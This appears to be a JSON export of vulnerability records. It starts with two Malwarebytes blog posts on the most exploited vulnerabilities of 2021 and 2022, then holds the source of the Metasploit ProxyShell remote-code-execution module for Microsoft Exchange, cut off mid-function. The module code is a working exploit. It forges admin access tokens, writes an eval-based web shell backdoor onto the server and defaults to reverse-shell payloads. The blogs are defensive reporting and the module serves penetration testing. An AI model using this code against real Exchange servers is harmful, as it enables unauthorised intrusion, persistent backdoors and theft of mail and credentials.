solution](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/09/fbi-and-cisa-warn-of-apt-groups-exploiting-adselfservice-plus/>) with resultant remote code execution (RCE) that exists in Zoho ManageEngine ADSelfService Plus version 6113 and prior. When word of this vulnerability came out it was already clear that it was being exploited in the wild. Zoho remarked that it was noticing indications of this vulnerability being exploited. Other researchers chimed in saying the attacks had thus far been highly targeted and limited, and possibly the work of a single threat actor. It was clear from the start that [APT](<https://blog.malwarebytes.com/glossary/advanced-persistent-threat-apt/>) threat-actors were likely among those exploiting the vulnerability.\n\nThe vulnerability allows an attacker to gain unauthorized access to the product through REST API endpoints by sending a specially crafted request. This allows attackers to carry out subsequent attacks resulting in RCE.\n\nFor those that have never heard of this software, it\u2019s a self-service password management and single sign-on (SSO) solution for Active Directory (AD) and cloud apps. Which means that any attacker that is able to exploit this vulnerability immediately has access to some of the most critical parts of a corporate network. A patch for this vulnerability was made available on September 7, 2021. Users were advised to update to ADSelfService Plus build 6114. The FBI, CISA, and CGCYBER also strongly urged organizations to make sure that ADSelfService Plus was not directly accessible from the Internet.\n\nThe [ManageEngine site](<https://www.manageengine.com/products/self-service-password/kb/how-to-fix-authentication-bypass-vulnerability-in-REST-API.html>) has specific instructions on how to identify and update vulnerable installations.\n\n## 3\\. ProxyShell\n\nThird on the list are 3 vulnerabilities that we commonly grouped together and referred to as [ProxyShell](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/08/patch-now-microsoft-exchange-attacks-target-proxyshell-vulnerabilities/>). [CVE-2021-34523](<https://nvd.nist.gov/vuln/detail/CVE-2021-34523>), [CVE-2021-34473](<https://nvd.nist.gov/vuln/detail/CVE-2021-34473>), and [CVE-2021-31207](<https://nvd.nist.gov/vuln/detail/CVE-2021-31207>).\n\nThe danger lies in the fact that these three vulnerabilities can be chained together to allow a remote attacker to run code on an unpatched Microsoft Exchange server. Attackers use them as follows:\n\n * **Get in** with CVE-2021-31207, a Microsoft Exchange Server security feature bypass vulnerability. The vulnerability allows a remote user to bypass the authentication process.\n * **Take control **with CVE-2021-34523, a Microsoft Exchange Server elevation of privilege (EoP) vulnerability. The vulnerability allows a user to raise their permissions.\n * **Do bad things** with CVE-2021-34473, a Microsoft Exchange Server remote code execution (RCE) vulnerability. The vulnerability allows an authenticated user to execute arbitrary code in the context of SYSTEM and write arbitrary files.\n\nThe vulnerabilities were found in Microsoft Exchange Server, which has a large userbase and which is usually set up as an Internet-facing instance. Plus, many publications have provided proof-of-concept (PoC) methodologies which anyone can copy and use.\n\nMicrosoft\u2019s Security Update from May 2021 remediates all three ProxyShell vulnerabilities.\n\n## 4\\. ProxyLogon\n\nAfter the ProxyShell entries we go straight to four vulnerabilities that are grouped under a similar name\u2014[ProxyLogon](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/03/proxylogon-poc-becomes-a-game-of-whack-a-mole/>)\u2014for similar reasons. [CVE-2021-26855](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855>), [CVE-2021-26857](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26857>), [CVE-2021-2685](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26858>), and [CVE-2021-27065](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-27065>) all share the same description\u2014"This vulnerability is part of an attack chain. The initial attack requires the ability to make an untrusted connection to Exchange server port 443."\n\nWhile the CVE description is the same for the 4 CVE\u2019s we have learned that CVE-2021-26855 is a server-side request forgery (SSRF) vulnerability in Exchange that was used to steal mailbox content. The RCE vulnerability CVE-2021-26857 was used to run code under the System account. The other two zero-day flaws\u2014CVE-2021-26858 and CVE-2021-27065\u2014would allow an attacker to write a file to any part of the server.\n\nTogether these four vulnerabilities form an attack chain that only requires the attacker to find the server running Exchange, and the account from which they want to extract email. After exploiting these vulnerabilities to gain initial access, threat actors deployed web shells on the compromised servers to gain persistence and make more changes. Web shells can allow attackers to steal data and perform additional malicious actions.\n\nProxyLogon started out as a limited and targeted attack method attributed to a group called [Hafnium](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/03/patch-now-exchange-servers-attacked-by-hafnium-zero-days/>). Unfortunately it went from limited and targeted attacks to a full-size panic in no time. Attackers started using the Exchange bugs to access vulnerable servers before establishing web shells to gain persistence and steal information.\n\nMicrosoft has released a one-click mitigation tool for Exchange Server deployments. The Microsoft Exchange On-Premises Mitigation Tool will help customers who do not have dedicated security or IT teams to apply these security updates. Details, a [download link](<https://aka.ms/eomt>), user instructions, and more information can be found in the [Microsoft Security Response Center](<https://msrc-blog.microsoft.com/2021/03/15/one-click-microsoft-exchange-on-premises-mitigation-tool-march-2021/>).\n\n## 5\\. CVE-2021-26084\n\n[CVE-2021-26084](<https://nvd.nist.gov/vuln/detail/CVE-2021-26084>) is an Object-Graph Navigation Language (OGNL) injection vulnerability that exists in some versions of [Confluence Server and Data Center](<https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html>) that can allow an unauthenticated attacker to execute arbitrary code on a Confluence Server or Data Center instance. This was a zero-day vulnerability that was only patched after it was found to be actively exploited in the wild. An attacker could exploit the vulnerability by simply sending a specially crafted HTTP request containing a malicious parameter to a vulnerable install.\n\nShortly after the vulnerability was disclosed and a patch came out, researchers noticed massive scanning activity for vulnerable instances and crypto-miners started to use the vulnerability to run their code on unpatched servers.\n\nOn the [Confluence Support website](<https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html>) you can find a list of affected versions, instructions to upgrade, and a workaround for those that are unable to upgrade.\n\n## Lessons learned\n\nWhat does this list tell us to look out for in 2022?\n\nWell, first off, if you haven\u2019t patched one of the above we would urgently advise you to do so. And it wouldn\u2019t hurt to continue working down the [list](<https://www.cisa.gov/uscert/ncas/alerts/aa22-117a>) provided by CISA.\n\nSecond, you may have noticed a pattern in what made these vulnerabilities so popular to exploit:\n\n * **A large attack surface**. Popular and widely used software makes for a larger number of potential victims. The money is in the numbers.\n * **Internet-facing instances**. Remember, your Internet-connected software shares the Internet with every basement-dwelling criminal hacker in the world.\n * **Easy exploitability**. When vulnerabilities are easy to exploit, and PoCs are publicly available and easy to deploy, the number of potential threat actors goes up.\n\nSo, if you notice or hear about a vulnerability that meets these "requirements" move it to the top of your "to-patch" list.\n\nStay safe, everyone!\n\nThe post [The top 5 most routinely exploited vulnerabilities of 2021](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/04/the-top-5-most-routinely-exploited-vulnerabilities-of-2021/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-04-29T16:28:20", "type": "malwarebytes", "title": "The top 5 most routinely exploited vulnerabilities of 2021", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084", "CVE-2021-2685", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-40539", "CVE-2021-44228", "CVE-2021-45046"], "modified": "2022-04-29T16:28:20", "id": "MALWAREBYTES:B8C767042833344389F6158273089954", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/04/the-top-5-most-routinely-exploited-vulnerabilities-of-2021/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-08-12T00:28:46", "description": "The Cybersecurity and Infrastructure Security Agency (CISA), National Security Agency (NSA), Federal Bureau of Investigation (FBI), and international partners have released a joint Cybersecurity Advisory (CSA) called the [2022 Top Routinely Exploited Vulnerabilities](<https://media.defense.gov/2023/Aug/03/2003273618/-1/-1/0/JOINT-CSA-2022-TOP-ROUTINELY-EXPLOITED-VULNERABILITIES.PDF>).\n\nWe went over the list and it felt like a bad trip down memory lane. If you adhere to the expression \"those who ignore history are doomed to repeat it\" then you may consider the list as a valuable resource that you can derive lessons from. Unfortunately as George Bernard Shaw said:\n\n> "We learn from history that we learn nothing from history."\n\nBut since that's a self-contradicting expression, let's assume there are lessons to be learned.\n\n## Last year's top vulnerabilities\n\nFirst let me show you the bad memories. The Common Vulnerabilities and Exposures (CVE) database lists publicly disclosed computer security flaws. We will use the CVE codes to uniquely identify the covered vulnerabilities.\n\n * [CVE-2021-40539](<https://vulners.com/cve/CVE-2021-40539>) is a REST API authentication bypass vulnerability in [ManageEngine's single sign-on (SSO) solution](<https://www.malwarebytes.com/blog/exploits-and-vulnerabilities/2021/09/fbi-and-cisa-warn-of-apt-groups-exploiting-adselfservice-plus/>) which results in remote code execution (RCE). When word of this vulnerability came out it was already clear that it was being exploited in the wild. Noteworthy is that this vulnerability also made it into the [top 5 routinely exploited vulnerabilities of 2021](<https://www.malwarebytes.com/blog/news/2022/04/the-top-5-most-routinely-exploited-vulnerabilities-of-2021>).\n * [CVE-2021-44228](<https://vulners.com/cve/CVE-2021-44228>), aka [Log4Shell](<https://www.malwarebytes.com/blog/news/2021/12/log4j-zero-day-log4shell-arrives-just-in-time-to-ruin-your-weekend>), is a vulnerability in Apache's Log4j library, an open-source logging framework incorporated into thousands of other products. Malicious cyber actors began exploiting the vulnerability after it was publicly disclosed in December 2021, and continued to show high interest throughout the first half of 2022.\n * [CVE-2018-13379](<https://vulners.com/cve/CVE-2018-13379>) is a vulnerability affecting Fortinet SSL VPNs, which was also routinely exploited in 2020 and 2021.\n * [ProxyShell](<https://www.malwarebytes.com/blog/news/2021/08/patch-now-microsoft-exchange-attacks-target-proxyshell-vulnerabilities>) is a combination of three vulnerabilities in Microsoft Exchange Server ([CVE-2021-34473](<https://vulners.com/cve/CVE-2021-34473>), [CVE-2021-31207](<https://vulners.com/cve/CVE-2021-31207>), and [CVE-2021-34523](<https://vulners.com/cve/CVE-2021-34523>)) that can be chained together to allow a remote attacker to break in, take control, and then do bad things on an unpatched server. Proxyshell also made it into the top 5 routinely exploited vulnerabilities of 2021.\n * [CVE-2021-26084](<https://vulners.com/cve/CVE-2021-26084>) is a vulnerability affecting Atlassian Confluence Server and Data Center which could enable an unauthenticated cyber actor to execute arbitrary code on vulnerable systems. This vulnerability quickly became one of the most routinely exploited vulnerabilities after a proof-of-concept (PoC) was released within a week of its disclosure. Attempted mass exploitation of this vulnerability was observed in September 2021 and also made it into the top 5 routinely exploited vulnerabilities of 2021.\n\nLooking at the above, it looks like Shaw was at least partly right. We are not learning from history. It also indicates that we should be able to predict some of the vulnerabilities that will show up in next year's list. Let's take a stab at that. So we're looking for easy to overlook and/or hard to patch vulnerabilities in the 2022 list that we haven't already covered above.\n\n## This year's top vulnerabilities?\n\nThese are the ones that I think will make it to the top 10 next year, maybe together with the ones that have already been around for years.\n\n * [CVE-2022-22954](<https://vulners.com/cve/CVE-2022-22954>), [CVE-2022-22960](<https://vulners.com/cve/CVE-2022-22960>) are two vulnerabilities that can be chained to allow Remote Code Execurion (RCE), privilege escalation, and authentication bypass in VMware Workspace ONE Access, Identity Manager, and other VMware products. Exploitation of these [VMware vulnerabilities](<https://www.malwarebytes.com/blog/news/2022/05/vmware-vulnerabilities-are-actively-being-exploited-cisa-warns>) began in early 2022 and attempts continued throughout the remainder of the year.\n * [CVE-2022-26134](<https://vulners.com/cve/CVE-2022-26134>) is a critical RCE vulnerability that affects Atlassian Confluence and Data Center. The vulnerability, which was likely initially exploited as a zero-day before public disclosure in June 2022, is related to an older Confluence vulnerability (see CVE-2021-26084 above), which cyber actors also exploited in 2022.\n * [CVE-2022-1388](<https://vulners.com/cve/CVE-2022-1388>) is a vulnerability in the F5 [BIG IP platform](<https://www.malwarebytes.com/blog/news/2022/05/update-now-exploits-are-active-for-f5-big-ip-vulnerability>) that allows attackers to bypass authentication on internet-exposed iControl interfaces, potentially executing arbitrary commands, creating or deleting files, or disabling services.\n * [CVE-2022-30190](<https://vulners.com/cve/CVE-2022-30190>), aka [Follina](<https://www.malwarebytes.com/blog/news/2022/06/faq-mitigating-microsoft-offices-follina-zero-day>), is a Microsoft Windows Support Diagnostic Tool RCE vulnerability. An attacker can send you a malicious Office document that will compromise your machine with malware when you open it.\n\nSo I was hoping we can strike a deal. I'll check next year how well this prediction does and you all patch these vulnerabilities real quick, so I can write about some new ones next year.\n\n* * *\n\n**We don't just report on vulnerabilities--we identify them, and prioritize action.**\n\nCybersecurity risks should never spread beyond a headline. Keep vulnerabilities in tow by using [Malwarebytes Vulnerability and Patch Management](<https://www.malwarebytes.com/business/vulnerability-patch-management>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2023-08-07T18:30:00", "type": "malwarebytes", "title": "2022's most routinely exploited vulnerabilities\u2014history repeats", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2021-26084", "CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-40539", "CVE-2021-44228", "CVE-2022-1388", "CVE-2022-22954", "CVE-2022-22960", "CVE-2022-26134", "CVE-2022-30190"], "modified": "2023-08-07T18:30:00", "id": "MALWAREBYTES:8922C922FFDE8B91C7154D8C990B62EF", "href": "https://www.malwarebytes.com/blog/news/2023/08/the-2022-top-routinely-exploited-vulnerabilities-history-repeats", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2021-08-20T15:47:04", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-20T00:00:00", "type": "packetstorm", "title": "Microsoft Exchange ProxyShell Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2021-08-20T00:00:00", "id": "PACKETSTORM:163895", "href": "https://packetstormsecurity.com/files/163895/Microsoft-Exchange-ProxyShell-Remote-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'winrm' \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \nprepend Msf::Exploit::Remote::AutoCheck \ninclude Msf::Exploit::CmdStager \ninclude Msf::Exploit::FileDropper \ninclude Msf::Exploit::Powershell \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::EXE \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Microsoft Exchange ProxyShell RCE', \n'Description' => %q{ \nThis module exploit a vulnerability on Microsoft Exchange Server that \nallows an attacker to bypass the authentication (CVE-2021-31207), impersonate an \narbitrary user (CVE-2021-34523) and write an arbitrary file (CVE-2021-34473) to achieve \nthe RCE (Remote Code Execution). \n \nBy taking advantage of this vulnerability, you can execute arbitrary \ncommands on the remote Microsoft Exchange Server. \n \nThis vulnerability affects Exchange 2013 CU23 < 15.0.1497.15, \nExchange 2016 CU19 < 15.1.2176.12, Exchange 2016 CU20 < 15.1.2242.5, \nExchange 2019 CU8 < 15.2.792.13, Exchange 2019 CU9 < 15.2.858.9. \n \nAll components are vulnerable by default. \n}, \n'Author' => [ \n'Orange Tsai', # Discovery \n'Jang (@testanull)', # Vulnerability analysis \n'PeterJson', # Vulnerability analysis \n'brandonshi123', # Vulnerability analysis \n'mekhalleh (RAMELLA S\u00e9bastien)', # exchange_proxylogon_rce template \n'Spencer McIntyre', # Metasploit module \n'wvu' # Testing \n], \n'References' => [ \n[ 'CVE', '2021-34473' ], \n[ 'CVE', '2021-34523' ], \n[ 'CVE', '2021-31207' ], \n[ 'URL', 'https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1' ], \n[ 'URL', 'https://i.blackhat.com/USA21/Wednesday-Handouts/us-21-ProxyLogon-Is-Just-The-Tip-Of-The-Iceberg-A-New-Attack-Surface-On-Microsoft-Exchange-Server.pdf' ], \n[ 'URL', 'https://y4y.space/2021/08/12/my-steps-of-reproducing-proxyshell/' ] \n], \n'DisclosureDate' => '2021-04-06', # pwn2own 2021 \n'License' => MSF_LICENSE, \n'DefaultOptions' => { \n'RPORT' => 443, \n'SSL' => true \n}, \n'Platform' => ['windows'], \n'Arch' => [ARCH_CMD, ARCH_X64, ARCH_X86], \n'Privileged' => true, \n'Targets' => [ \n[ \n'Windows Powershell', \n{ \n'Platform' => 'windows', \n'Arch' => [ARCH_X64, ARCH_X86], \n'Type' => :windows_powershell, \n'DefaultOptions' => { \n'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp' \n} \n} \n], \n[ \n'Windows Dropper', \n{ \n'Platform' => 'windows', \n'Arch' => [ARCH_X64, ARCH_X86], \n'Type' => :windows_dropper, \n'CmdStagerFlavor' => %i[psh_invokewebrequest], \n'DefaultOptions' => { \n'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp', \n'CMDSTAGER::FLAVOR' => 'psh_invokewebrequest' \n} \n} \n], \n[ \n'Windows Command', \n{ \n'Platform' => 'windows', \n'Arch' => [ARCH_CMD], \n'Type' => :windows_command, \n'DefaultOptions' => { \n'PAYLOAD' => 'cmd/windows/powershell_reverse_tcp' \n} \n} \n] \n], \n'DefaultTarget' => 0, \n'Notes' => { \n'Stability' => [CRASH_SAFE], \n'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS], \n'AKA' => ['ProxyShell'], \n'Reliability' => [REPEATABLE_SESSION] \n} \n) \n) \n \nregister_options([ \nOptString.new('EMAIL', [true, 'A known email address for this organization']), \nOptBool.new('UseAlternatePath', [true, 'Use the IIS root dir as alternate path', false]), \n]) \n \nregister_advanced_options([ \nOptString.new('BackendServerName', [false, 'Force the name of the backend Exchange server targeted']), \nOptString.new('ExchangeBasePath', [true, 'The base path where exchange is installed', 'C:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\V15']), \nOptString.new('ExchangeWritePath', [true, 'The path where you want to write the backdoor', 'owa\\\\auth']), \nOptString.new('IISBasePath', [true, 'The base path where IIS wwwroot directory is', 'C:\\\\inetpub\\\\wwwroot']), \nOptString.new('IISWritePath', [true, 'The path where you want to write the backdoor', 'aspnet_client']), \nOptString.new('MapiClientApp', [true, 'This is MAPI client version sent in the request', 'Outlook/15.0.4815.1002']), \nOptString.new('UserAgent', [true, 'The HTTP User-Agent sent in the request', 'Mozilla/5.0']) \n]) \nend \n \ndef check \n@ssrf_email ||= Faker::Internet.email \nres = send_http('GET', '/mapi/nspi/') \nreturn CheckCode::Unknown if res.nil? \nreturn CheckCode::Safe unless res.code == 200 && res.get_html_document.xpath('//head/title').text == 'Exchange MAPI/HTTP Connectivity Endpoint' \n \nCheckCode::Vulnerable \nend \n \ndef cmd_windows_generic? \ndatastore['PAYLOAD'] == 'cmd/windows/generic' \nend \n \ndef encode_cmd(cmd) \ncmd.gsub!('\\\\', '\\\\\\\\\\\\') \ncmd.gsub('\"', '\\u0022').gsub('&', '\\u0026').gsub('+', '\\u002b') \nend \n \ndef random_mapi_id \nid = \"{#{Rex::Text.rand_text_hex(8)}\" \nid = \"#{id}-#{Rex::Text.rand_text_hex(4)}\" \nid = \"#{id}-#{Rex::Text.rand_text_hex(4)}\" \nid = \"#{id}-#{Rex::Text.rand_text_hex(4)}\" \nid = \"#{id}-#{Rex::Text.rand_text_hex(12)}}\" \nid.upcase \nend \n \ndef request_autodiscover(_server_name) \nxmlns = { 'xmlns' => 'http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a' } \n \nresponse = send_http( \n'POST', \n'/autodiscover/autodiscover.xml', \ndata: soap_autodiscover, \nctype: 'text/xml; charset=utf-8' \n) \n \ncase response.body \nwhen %r{<ErrorCode>500</ErrorCode>} \nfail_with(Failure::NotFound, 'No Autodiscover information was found') \nwhen %r{<Action>redirectAddr</Action>} \nfail_with(Failure::NotFound, 'No email address was found') \nend \n \nxml = Nokogiri::XML.parse(response.body) \n \nlegacy_dn = xml.at_xpath('//xmlns:User/xmlns:LegacyDN', xmlns)&.content \nfail_with(Failure::NotFound, 'No \\'LegacyDN\\' was found') if legacy_dn.nil? || legacy_dn.empty? \n \nserver = '' \nxml.xpath('//xmlns:Account/xmlns:Protocol', xmlns).each do |item| \ntype = item.at_xpath('./xmlns:Type', xmlns)&.content \nif type == 'EXCH' \nserver = item.at_xpath('./xmlns:Server', xmlns)&.content \nend \nend \nfail_with(Failure::NotFound, 'No \\'Server ID\\' was found') if server.nil? || server.empty? \n \n{ server: server, legacy_dn: legacy_dn } \nend \n \ndef request_fqdn \nntlm_ssp = \"NTLMSSP\\x00\\x01\\x00\\x00\\x00\\x05\\x02\\x88\\xa0\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" \nreceived = send_request_raw( \n'method' => 'RPC_IN_DATA', \n'uri' => normalize_uri('rpc', 'rpcproxy.dll'), \n'headers' => { \n'Authorization' => \"NTLM #{Rex::Text.encode_base64(ntlm_ssp)}\" \n} \n) \nfail_with(Failure::TimeoutExpired, 'Server did not respond in an expected way') unless received \n \nif received.code == 401 && received['WWW-Authenticate'] && received['WWW-Authenticate'].match(/^NTLM/i) \nhash = received['WWW-Authenticate'].split('NTLM ')[1] \nmessage = Net::NTLM::Message.parse(Rex::Text.decode_base64(hash)) \ndns_server = Net::NTLM::TargetInfo.new(message.target_info).av_pairs[Net::NTLM::TargetInfo::MSV_AV_DNS_COMPUTER_NAME] \n \nreturn dns_server.force_encoding('UTF-16LE').encode('UTF-8').downcase \nend \n \nfail_with(Failure::NotFound, 'No Backend server was found') \nend \n \n# https://docs.microsoft.com/en-us/openspecs/exchange_server_protocols/ms-oxcmapihttp/c245390b-b115-46f8-bc71-03dce4a34bff \ndef request_mapi(_server_name, legacy_dn) \ndata = \"#{legacy_dn}\\x00\\x00\\x00\\x00\\x00\\xe4\\x04\\x00\\x00\\x09\\x04\\x00\\x00\\x09\\x04\\x00\\x00\\x00\\x00\\x00\\x00\" \nheaders = { \n'X-RequestType' => 'Connect', \n'X-ClientInfo' => random_mapi_id, \n'X-ClientApplication' => datastore['MapiClientApp'], \n'X-RequestId' => \"#{random_mapi_id}:#{Rex::Text.rand_text_numeric(5)}\" \n} \n \nsid = '' \nresponse = send_http( \n'POST', \n'/mapi/emsmdb', \ndata: data, \nctype: 'application/mapi-http', \nheaders: headers \n) \nif response&.code == 200 \nsid = response.body.match(/S-[0-9]*-[0-9]*-[0-9]*-[0-9]*-[0-9]*-[0-9]*-[0-9]*/).to_s \nend \nfail_with(Failure::NotFound, 'No \\'SID\\' was found') if sid.empty? \n \nsid \nend \n \n# pre-authentication SSRF (Server Side Request Forgery) + impersonate as admin. \ndef run_cve_2021_34473 \nif datastore['BackendServerName'] && !datastore['BackendServerName'].empty? \nserver_name = datastore['BackendServerName'] \nprint_status(\"Internal server name forced to: #{server_name}\") \nelse \nprint_status('Retrieving backend FQDN over RPC request') \nserver_name = request_fqdn \nprint_status(\"Internal server name: #{server_name}\") \nend \n@backend_server_name = server_name \n \n# get information via an autodiscover request. \nprint_status('Sending autodiscover request') \nautodiscover = request_autodiscover(server_name) \n \nprint_status(\"Server: #{autodiscover[:server]}\") \nprint_status(\"LegacyDN: #{autodiscover[:legacy_dn]}\") \n \n# get the user UID using mapi request. \nprint_status('Sending mapi request') \nmailbox_user_sid = request_mapi(server_name, autodiscover[:legacy_dn]) \nprint_status(\"SID: #{mailbox_user_sid} (#{datastore['EMAIL']})\") \n \nsend_payload(mailbox_user_sid) \n@common_access_token = build_token(mailbox_user_sid) \nend \n \ndef send_http(method, uri, opts = {}) \nssrf = \"Autodiscover/autodiscover.json?a=#{@ssrf_email}\" \nunless opts[:cookie] == :none \nopts[:cookie] = \"Email=#{ssrf}\" \nend \n \nrequest = { \n'method' => method, \n'uri' => \"/#{ssrf}#{uri}\", \n'agent' => datastore['UserAgent'], \n'ctype' => opts[:ctype], \n'headers' => { 'Accept' => '*/*', 'Cache-Control' => 'no-cache', 'Connection' => 'keep-alive' } \n} \nrequest = request.merge({ 'data' => opts[:data] }) unless opts[:data].nil? \nrequest = request.merge({ 'cookie' => opts[:cookie] }) unless opts[:cookie].nil? \nrequest = request.merge({ 'headers' => opts[:headers] }) unless opts[:headers].nil? \n \nreceived = send_request_cgi(request) \nfail_with(Failure::TimeoutExpired, 'Server did not respond in an expected way') unless received \n \nreceived \nend \n \ndef send_payload(user_sid) \n@shell_input_name = rand_text_alphanumeric(8..12) \n@draft_subject = rand_text_alphanumeric(8..12) \npayload = Rex::Text.encode_base64(PstEncoding.encode(\"#<script language=\\\"JScript\\\" runat=\\\"server\\\">function Page_Load(){eval(Request[\\\"#{@shell_input_name}\\\"],\\\"unsafe\\\");}</script>\")) \nfile_name = \"#{Faker::Lorem.word}#{%w[- _].sample}#{Faker::Lorem.word}.#{%w[rtf pdf docx xlsx pptx zip].sample}\" \nenvelope = XMLTemplate.render('soap_draft', user_sid: user_sid, file_content: payload, file_name: file_name, subject: @draft_subject) \n \nsend_http('POST', '/ews/exchange.asmx', data: envelope, ctype: 'text/xml;charset=UTF-8') \nend \n \ndef soap_autodiscover \n<<~SOAP \n<?xml version=\"1.0\" encoding=\"utf-8\"?> \n<Autodiscover xmlns=\"http://schemas.microsoft.com/exchange/autodiscover/outlook/requestschema/2006\"> \n<Request> \n<EMailAddress>#{datastore['EMAIL'].encode(xml: :text)}</EMailAddress> \n<AcceptableResponseSchema>http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a</AcceptableResponseSchema> \n</Request> \n</Autodiscover> \nSOAP \nend \n \ndef web_directory \nif datastore['UseAlternatePath'] \ndatastore['IISWritePath'].gsub('\\\\', '/') \nelse \ndatastore['ExchangeWritePath'].gsub('\\\\', '/') \nend \nend \n \ndef build_token(sid) \nuint8_tlv = proc do |type, value| \ntype + [value.length].pack('C') + value \nend \n \ntoken = uint8_tlv.call('V', \"\\x00\") \ntoken << uint8_tlv.call('T', 'Windows') \ntoken << \"\\x43\\x00\" \ntoken << uint8_tlv.call('A', 'Kerberos') \ntoken << uint8_tlv.call('L', datastore['EMAIL']) \ntoken << uint8_tlv.call('U', sid) \n \n# group data for S-1-5-32-544 \ntoken << \"\\x47\\x01\\x00\\x00\\x00\\x07\\x00\\x00\\x00\\x0c\\x53\\x2d\\x31\\x2d\\x35\\x2d\\x33\\x32\\x2d\\x35\\x34\\x34\\x45\\x00\\x00\\x00\\x00\" \nRex::Text.encode_base64(token) \nend \n \ndef execute_powershell(cmdlet, args: []) \nwinrm = SSRFWinRMConnection.new({ \nendpoint: full_uri('PowerShell/'), \ntransport: :ssrf, \nssrf_proc: proc do |method, uri, opts| \nuri = \"#{uri}?X-Rps-CAT=#{@common_access_token}\" \nuri << \"&Email=Autodiscover/autodiscover.json?a=#{@ssrf_email}\" \nopts[:cookie] = :none \nopts[:data].gsub!( \n%r{<#{WinRM::WSMV::SOAP::NS_ADDRESSING}:To>(.*?)</#{WinRM::WSMV::SOAP::NS_ADDRESSING}:To>}, 